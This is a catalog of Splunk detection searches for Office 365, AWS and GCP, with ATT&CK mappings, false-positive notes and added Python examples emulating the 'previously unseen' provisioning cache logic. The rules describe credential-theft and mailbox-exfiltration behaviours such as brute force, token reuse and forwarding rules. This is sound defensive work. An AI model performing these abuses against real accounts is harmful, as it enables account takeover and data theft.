`o365_management_activity` Workload=AzureActiveDirectory UserAuthenticationMethod=* status=Failed | stats count earliest(_time) as firstTime latest(_time) as lastTime values(UserAuthenticationMethod) AS UserAuthenticationMethod values(UserAgent) AS UserAgent values(status) AS status values(src_ip) AS src_ip by user | where count > 10 |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_excessive_authentication_failures_alert_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for Microsoft Office 365. This search works with o365:management:activity logs.

Required field

ATT&CK

ID Technique Tactic
T1110 Brute Force Credential Access


Kill Chain Phase

  • Not Applicable


Known False Positives

The alert threshold is more than 10 failed attempts, which should reduce the number of false positives.

Reference


Test Dataset


version: 1


O365 excessive sso logon errors

This search detects accounts with a high number of Single Sign-On (SSO) logon errors. Excessive logon errors may indicate attempts to brute-force a password, or to hijack or reuse a single sign-on token.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1556
  • Last Updated: 2021-01-26

Search

`o365_management_activity` Workload=AzureActiveDirectory LogonError=SsoArtifactInvalidOrExpired | stats count min(_time) as firstTime max(_time) as lastTime by LogonError ActorIpAddress UserAgent UserId | where count > 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_excessive_sso_logon_errors_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for Microsoft Office 365. This search works with o365:management:activity logs.

Required field

ATT&CK

ID Technique Tactic
T1556 Modify Authentication Process Credential Access, Defense Evasion


Kill Chain Phase

  • Actions on Objective


Known False Positives

Logon errors may not be malicious in nature; however, they may indicate attempts to reuse a token or password obtained via a credential access attack.

Reference


Test Dataset


version: 1


O365 new federated domain added

This search detects the addition of a new Federated domain.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1136.003
  • Last Updated: 2021-01-26

Search

`o365_management_activity` Workload=Exchange Operation="Add-FederatedDomain" | stats count min(_time) as firstTime max(_time) as lastTime values(Parameters{}.Value) as Parameters.Value by ObjectId Operation OrganizationName OriginatingServer UserId UserKey | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_federated_domain_added_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for Microsoft Office 365. This search works with o365:management:activity logs.

Required field

ATT&CK

ID Technique Tactic
T1136.003 Cloud Account Persistence


Kill Chain Phase

  • Actions on Objective


Known False Positives

The creation of a new Federated domain is not necessarily malicious; however, these events need to be followed closely, as they may indicate federated credential abuse or a backdoor via federated identities at a similar or different cloud provider.

Reference


Test Dataset


version: 1


O365 pst export alert

This search detects when a user has performed an eDiscovery search or exported a PST file from the search. Such a PST file usually contains sensitive information, including email body content.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1114
  • Last Updated: 2020-12-16

Search

`o365_management_activity` Category=ThreatManagement Name="eDiscovery search started or exported" | stats count earliest(_time) as firstTime latest(_time) as lastTime by Source Severity AlertEntityId Operation Name |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_pst_export_alert_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for Microsoft Office 365. This search works with o365:management:activity logs.

Required field

ATT&CK

ID Technique Tactic
T1114 Email Collection Collection


Kill Chain Phase

  • Actions on Objective


Known False Positives

PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored.

Reference


Test Dataset


version: 1


O365 suspicious admin email forwarding

This search detects when an admin configured a forwarding rule for multiple mailboxes to the same destination.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1114.003
  • Last Updated: 2020-12-16

Search

`o365_management_activity` Operation=Set-Mailbox | spath input=Parameters | rename Identity AS src_user | search ForwardingAddress=* | stats dc(src_user) AS count_src_user earliest(_time) as firstTime latest(_time) as lastTime values(src_user) AS src_user values(user) AS user by ForwardingAddress | where count_src_user > 1 |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`o365_suspicious_admin_email_forwarding_filter`

Associated Analytic Story


How To Implement

Required field

ATT&CK

ID Technique Tactic
T1114.003 Email Forwarding Rule Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

unknown

Reference

Test Dataset


version: 1


O365 suspicious rights delegation

This search detects the assignment of rights to access content from another mailbox. This is usually only assigned to a service account.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1114.002
  • Last Updated: 2020-12-15

Search

`o365_management_activity` Operation=Add-MailboxPermission | spath input=Parameters | rename User AS src_user, Identity AS dest_user | search AccessRights=FullAccess OR AccessRights=SendAs OR AccessRights=SendOnBehalf | stats count earliest(_time) as firstTime latest(_time) as lastTime by user src_user dest_user Operation AccessRights |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`o365_suspicious_rights_delegation_filter`

Associated Analytic Story


How To Implement

Required field

ATT&CK

ID Technique Tactic
T1114.002 Remote Email Collection Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Service Accounts

Reference

Test Dataset


version: 1


O365 suspicious user email forwarding

This search detects when multiple users configured a forwarding rule to the same destination.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1114.003
  • Last Updated: 2020-12-16

Search

`o365_management_activity` Operation=Set-Mailbox | spath input=Parameters | rename Identity AS src_user | search ForwardingSmtpAddress=* | stats dc(src_user) AS count_src_user earliest(_time) as firstTime latest(_time) as lastTime values(src_user) AS src_user values(user) AS user by ForwardingSmtpAddress | where count_src_user > 1 |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`o365_suspicious_user_email_forwarding_filter`

Associated Analytic Story


How To Implement

Required field

ATT&CK

ID Technique Tactic
T1114.003 Email Forwarding Rule Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

unknown

Reference

Test Dataset


version: 1


Aws detect attach to role policy

This search provides detection of a user attaching themselves to a different role trust policy. This can be used for lateral movement and escalation of privileges.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-07-27

Search

`aws_cloudwatchlogs_eks` attach policy | spath requestParameters.policyArn | table sourceIPAddress user_access_key userIdentity.arn userIdentity.sessionContext.sessionIssuer.arn eventName errorCode errorMessage status action requestParameters.policyArn userIdentity.sessionContext.attributes.mfaAuthenticated userIdentity.sessionContext.attributes.creationDate | `aws_detect_attach_to_role_policy_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudWatch logs.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

Attaching to a policy can create a lot of noise. This search can be adjusted with specific values to identify cases of abuse (e.g. status=failure). The search can provide context on common users attaching themselves to higher-privilege policies or even to newly created policies.

Reference

Test Dataset

version: 1


Aws detect permanent key creation

This search provides detection of accounts creating permanent keys. Permanent keys are not created by default and are only needed for programmatic calls. Creation of a permanent key is an important event to monitor.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-07-27

Search

`aws_cloudwatchlogs_eks` CreateAccessKey | spath eventName | search eventName=CreateAccessKey "userIdentity.type"=IAMUser | table sourceIPAddress userName userIdentity.type userAgent action status responseElements.accessKey.createDate responseElements.accessKey.status responseElements.accessKey.accessKeyId |`aws_detect_permanent_key_creation_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudWatch logs.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all permanent key creations are malicious. If there is a key rotation policy, this search can be adjusted to provide better context.

Reference

Test Dataset

version: 1


Aws detect role creation

This search provides detection of role creation by IAM users. Role creation is notable in itself when a user creates a new role with trust policies that differ from those available in AWS, and it can be used for lateral movement and escalation of privileges.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-07-27

Search

`aws_cloudwatchlogs_eks` event_name=CreateRole action=created userIdentity.type=AssumedRole requestParameters.description=Allows* | table sourceIPAddress userIdentity.principalId userIdentity.arn action event_name awsRegion http_user_agent mfa_auth msg requestParameters.roleName requestParameters.description responseElements.role.arn responseElements.role.createDate | `aws_detect_role_creation_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudWatch logs.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

CreateRole is not very common among ordinary users. This search can be adjusted with specific values to identify cases of abuse. In general, AWS provides plenty of trust policies that fit most use cases.

Reference

Test Dataset

version: 1


Aws detect sts assume role abuse

This search provides detection of suspicious use of sts:AssumeRole. These tokens can be created on the go and used by attackers to move laterally and escalate privileges.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-07-27

Search

`cloudtrail` user_type=AssumedRole userIdentity.sessionContext.sessionIssuer.type=Role | table sourceIPAddress userIdentity.arn user_agent user_access_key status action requestParameters.roleName responseElements.role.roleName responseElements.role.createDate | `aws_detect_sts_assume_role_abuse_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudTrail logs.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

sts:AssumeRole can be very noisy, as it is a standard mechanism for providing cross-account and cross-resource access. This search can be adjusted with specific values to identify cases of abuse.

Reference

Test Dataset

version: 1


Aws detect sts get session token abuse

This search provides detection of suspicious use of sts:GetSessionToken. These tokens can be created on the go and used by attackers to move laterally and escalate privileges.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1550
  • Last Updated: 2020-07-27

Search

`aws_cloudwatchlogs_eks` ASIA userIdentity.type=IAMUser | spath eventName | search eventName=GetSessionToken | table sourceIPAddress eventTime userIdentity.arn userName userAgent user_type status region | `aws_detect_sts_get_session_token_abuse_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for AWS and the Splunk App for AWS. This search works with CloudWatch logs.

Required field

ATT&CK

ID Technique Tactic
T1550 Use Alternate Authentication Material Defense Evasion, Lateral Movement


Kill Chain Phase

  • Lateral Movement


Known False Positives

sts:GetSessionToken can be very noisy, as in certain environments numerous calls of this type are executed. This search can be adjusted with specific values to identify cases of abuse. In specific environments the requestParameters.serialNumber field will need to be used.

Reference

Test Dataset

version: 1


Gcp detect oauth token abuse

This search provides detection of possible GCP OAuth token abuse. A GCP OAuth token without a time limit can be exfiltrated and reused to keep access sessions alive without further authentication control, allowing attackers to access resources and move laterally.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-09-01

Search

`google_gcp_pubsub_message` type.googleapis.com/google.cloud.audit.AuditLog |table protoPayload.@type protoPayload.status.details{}.@type protoPayload.status.details{}.violations{}.callerIp protoPayload.status.details{}.violations{}.type protoPayload.status.message | `gcp_detect_oauth_token_abuse_filter`

Associated Analytic Story


How To Implement

You must install the Splunk add-on for GCP. This search works with gcp:pubsub:message logs.

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

GCP OAuth token abuse detection will only work if access policies are in place along with audit logs.

Reference


Test Dataset

version: 1



Deprecated

Aws cloud provisioning from previously unseen city

This search looks for AWS provisioning activities from previously unseen cities. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and has been translated to use the latest Change data model.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1535
  • Last Updated: 2018-03-16

Search

`cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search City=* [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search City=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by City | eval newCity=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newCity=1 | table City] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, City, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_city_filter`
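The three deprecated "previously unseen" searches share one pattern: the subsearch merges the current window's first/last-seen times per source with the cached lookup, writes the merge back, and flags any value whose earliest firstTime falls inside the last 70 minutes. The Python below is an added example (not part of Splunk Security Content) that implements that cache-and-baseline logic over constructed CloudTrail events, generalized so one function emulates the City, Country and IP variants by choosing the grouping field. The events are already geolocated as iplocation would do, the cache is a plain dict standing in for previously_seen_provisioning_activity_src.csv, and the constructed timestamps, IPs and ARNs are sample values, not data from this page.

```python
from typing import Dict, Iterable, List, Tuple

# Columns of the previously_seen_provisioning_activity_src.csv lookup.
SRC_FIELDS = ("sourceIPAddress", "City", "Region", "Country")
SrcKey = Tuple[str, str, str, str]
Cache = Dict[SrcKey, Tuple[int, int]]  # (firstTime, lastTime) per source, epoch seconds


def is_provisioning(event: dict) -> bool:
    """eventName=Run* OR eventName=Create*"""
    name = event.get("eventName", "")
    return name.startswith("Run") or name.startswith("Create")


def snap_window_start(now: int, minutes: int = 70) -> int:
    """relative_time(now(), "-70m@m"): subtract 70 minutes, then snap to the minute."""
    return ((now - minutes * 60) // 60) * 60


def update_cache(cache: Cache, events: Iterable[dict]) -> Cache:
    """stats earliest/latest by source | inputlookup append=t | stats min/max | outputlookup"""
    merged = dict(cache)
    for ev in events:
        if not is_provisioning(ev) or not ev.get("Country"):
            continue  # the subsearch keeps only geolocated provisioning events
        key = tuple(ev[f] for f in SRC_FIELDS)
        t = ev["_time"]
        first, last = merged.get(key, (t, t))
        merged[key] = (min(first, t), max(last, t))
    return merged


def first_seen_values(cache: Cache, field: str, now: int) -> set:
    """stats min(firstTime) by <field> | where firstTime >= relative_time(now(), "-70m@m")"""
    idx = SRC_FIELDS.index(field)
    first_by_value: Dict[str, int] = {}
    for key, (first, _last) in cache.items():
        value = key[idx]
        first_by_value[value] = min(first, first_by_value.get(value, first))
    cutoff = snap_window_start(now)
    return {v for v, first in first_by_value.items() if first >= cutoff}


def detect_unseen(events: List[dict], cache: Cache, now: int,
                  field: str = "City") -> Tuple[List[dict], Cache]:
    """Return (hits, updated cache). `field` picks which deprecated search to
    emulate: "City", "Country" or "sourceIPAddress"."""
    updated = update_cache(cache, events)
    fresh = first_seen_values(updated, field, now)
    hits = [
        {"_time": ev["_time"], "user": ev.get("userIdentity.arn"),
         "src_ip": ev["sourceIPAddress"], field: ev.get(field),
         "eventName": ev["eventName"], "errorCode": ev.get("errorCode")}
        for ev in events if is_provisioning(ev) and ev.get(field) in fresh
    ]
    return hits, updated


# Constructed fixture: a fixed "now" keeps the example deterministic.
NOW = 1_700_000_000
# History a prior run of the support search would have left in the lookup.
SEED_CACHE: Cache = {
    ("203.0.113.5", "Berlin", "BE", "Germany"): (NOW - 86_400, NOW - 3_600),
}
# Constructed CloudTrail events, pre-geolocated the way iplocation would.
SAMPLE_EVENTS = [
    {"_time": NOW - 300, "sourceIPAddress": "203.0.113.5", "City": "Berlin",
     "Region": "BE", "Country": "Germany", "eventName": "RunInstances",
     "userIdentity.arn": "arn:aws:iam::123456789012:user/ci", "errorCode": None},
    {"_time": NOW - 600, "sourceIPAddress": "198.51.100.7", "City": "Lisbon",
     "Region": "11", "Country": "Portugal", "eventName": "CreateUser",
     "userIdentity.arn": "arn:aws:iam::123456789012:user/alice", "errorCode": None},
    {"_time": NOW - 120, "sourceIPAddress": "192.0.2.9", "City": "Oslo",
     "Region": "03", "Country": "Norway", "eventName": "DescribeInstances",
     "userIdentity.arn": "arn:aws:iam::123456789012:user/bob", "errorCode": None},
]

if __name__ == "__main__":
    hits, _ = detect_unseen(SAMPLE_EVENTS, SEED_CACHE, NOW, "City")
    for hit in hits:
        print(hit)
```

Running detect_unseen with an empty cache reports Berlin as well as Lisbon, which is exactly the "run the support search once first" caveat from the implementation notes: with no history, every source looks new. The Oslo event is never reported because DescribeInstances is not a provisioning event, and it is never written to the cache either.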

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.

This search will fire any time a new city is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your city, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset

version: 1


Aws cloud provisioning from previously unseen country

This search looks for AWS provisioning activities from previously unseen countries. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and has been translated to use the latest Change data model.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1535
  • Last Updated: 2018-03-16

Search

`cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Country=* [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Country=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by Country | eval newCountry=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newCountry=1 | table Country] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, Country, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_country_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching over, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.

This search will fire any time a new country is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset

version: 1


Aws cloud provisioning from previously unseen ip address

This search looks for AWS provisioning activities from previously unseen IP addresses. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and has been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-03-16

Search

`cloudtrail` (eventName=Run* OR eventName=Create*) [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Country=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress | eval newIP=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newIP=1 | table sourceIPAddress] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_ip_address_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources.

Required field

Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.

This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset

version: 1


Aws cloud provisioning from previously unseen region

This search looks for AWS provisioning activities from previously unseen regions. Region in this context is similar to a state in the United States. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and has been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1535
  • Last Updated: 2018-03-16

Search

`cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Region=* [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Region=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by Region | eval newRegion=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newRegion=1 | table Region] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, Region, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_region_filter`
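The three provisioning searches above (country, IP address and region) share one mechanism: merge this run's sources into a cached lookup, then alert on any value of the chosen dimension whose earliest sighting falls inside the last 70 minutes. The following is an added example, not Splunk's code; `GEO` is a constructed stand-in for the `iplocation` lookup, and the events, ARNs and cache contents are constructed.

```python
"""The 'previously unseen' cache pattern shared by the AWS provisioning
detections (country, IP address, region). Added example, not Splunk's code.
`GEO` is a constructed stand-in for the `iplocation` lookup and the events
are constructed CloudTrail-like records."""
from datetime import datetime, timedelta, timezone

NEW_WINDOW = timedelta(minutes=70)           # relative_time(now(), "-70m@m")
PROVISIONING = ("Run", "Create")             # eventName=Run* OR eventName=Create*
# cache key layout: (sourceIPAddress, City, Region, Country)
DIM = {"sourceIPAddress": 0, "City": 1, "Region": 2, "Country": 3}

# Constructed stand-in for the MaxMind GeoIP data behind `iplocation` (assumption).
GEO = {
    "203.0.113.10": ("Seattle", "Washington", "United States"),
    "203.0.113.11": ("Portland", "Oregon", "United States"),
    "198.51.100.7": ("Frankfurt", "Hesse", "Germany"),
}

def geo_key(event):
    """Cache key for a resolvable provisioning event, else None
    (the eventName filter plus `search Country=*`)."""
    ip = event["sourceIPAddress"]
    if not event["eventName"].startswith(PROVISIONING) or ip not in GEO:
        return None
    return (ip,) + GEO[ip]

def update_cache(cache, events):
    """stats earliest/latest by key | inputlookup append=t cache
    | stats min(firstTime) max(lastTime) by key | outputlookup cache"""
    merged = dict(cache)
    for ev in events:
        key = geo_key(ev)
        if key is None:
            continue
        t = ev["eventTime"]
        first, last = merged.get(key, (t, t))
        merged[key] = (min(first, t), max(last, t))
    return merged

def newly_seen(cache, dimension, now):
    """Collapse the cache onto one dimension and return the values whose
    earliest firstTime falls inside the window (the subsearch's result)."""
    idx = DIM[dimension]
    first_seen = {}
    for key, (first, _last) in cache.items():
        first_seen[key[idx]] = min(first, first_seen.get(key[idx], first))
    return {v for v, first in first_seen.items() if first >= now - NEW_WINDOW}

def detect(cache, events, dimension, now):
    """Outer search: provisioning events whose value on `dimension` is new.
    Returns (alerts, updated_cache); the caller persists the cache."""
    merged = update_cache(cache, events)
    fresh = newly_seen(merged, dimension, now)
    alerts = []
    for ev in events:
        key = geo_key(ev)
        if key is not None and key[DIM[dimension]] in fresh:
            alerts.append({"_time": ev["eventTime"], "user": ev["userIdentity"]["arn"],
                           "src_ip": ev["sourceIPAddress"], dimension: key[DIM[dimension]],
                           "eventName": ev["eventName"], "errorCode": ev.get("errorCode")})
    return alerts, merged

NOW = datetime(2020, 7, 21, 12, 0, tzinfo=timezone.utc)   # constructed 'now'

def run_example(dimension):
    """Seattle has provisioned for a month; this hour brings a new Oregon IP in
    the same country and a first-ever event from Germany (all constructed)."""
    cache = {("203.0.113.10", "Seattle", "Washington", "United States"):
             (NOW - timedelta(days=30), NOW - timedelta(days=1))}

    def ev(name, ip, minutes_ago, arn="arn:aws:iam::123456789012:user/alice"):
        return {"eventName": name, "sourceIPAddress": ip, "errorCode": None,
                "eventTime": NOW - timedelta(minutes=minutes_ago),
                "userIdentity": {"arn": arn}}

    events = [
        ev("RunInstances", "203.0.113.11", 10),
        ev("CreateUser", "198.51.100.7", 5, "arn:aws:iam::123456789012:user/bob"),
        ev("DescribeInstances", "198.51.100.7", 5),   # not provisioning, ignored
        ev("RunInstances", "203.0.113.10", 2),         # long-known source
    ]
    alerts, _cache = detect(cache, events, dimension, NOW)
    return alerts

if __name__ == "__main__":
    for dim in ("Country", "Region", "sourceIPAddress"):
        print(dim, [a[dim] for a in run_example(dim)])
```

Running the same events through each dimension shows why the three searches differ in noise: the Oregon IP is new as an IP and as a region, but not as a country.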

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.

This search will fire any time a new region is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your region, there should be few false positives. If you are located in regions where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset

version: 1


Abnormally high aws instances launched by user

This search looks for CloudTrail events where a user successfully launches an abnormally high number of instances. This search is deprecated and has been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventName=RunInstances errorCode=success | bucket span=10m _time | stats count AS instances_launched by _time userName | eventstats avg(instances_launched) as total_launched_avg, stdev(instances_launched) as total_launched_stdev | eval threshold_value = 4 | eval isOutlier=if(instances_launched > total_launched_avg+(total_launched_stdev * threshold_value), 1, 0) | search isOutlier=1 AND _time >= relative_time(now(), "-10m@m") | eval num_standard_deviations_away = round(abs(instances_launched - total_launched_avg) / total_launched_stdev, 2) | table _time, userName, instances_launched, num_standard_deviations_away, total_launched_avg, total_launched_stdev | `abnormally_high_aws_instances_launched_by_user_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. The threshold value should be tuned to your environment.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.

Reference

Test Dataset

version: 2


Abnormally high aws instances launched by user - mltk

This search looks for CloudTrail events where a user successfully launches an abnormally high number of instances. This search is deprecated and has been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventName=RunInstances errorCode=success `abnormally_high_aws_instances_launched_by_user___mltk_filter` | bucket span=10m _time | stats count as instances_launched by _time src_user | apply ec2_excessive_runinstances_v1 | rename "IsOutlier(instances_launched)" as isOutlier | where isOutlier=1

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. The threshold value should be tuned to your environment.

Required field

ATT&CK

ID Technique Tactic
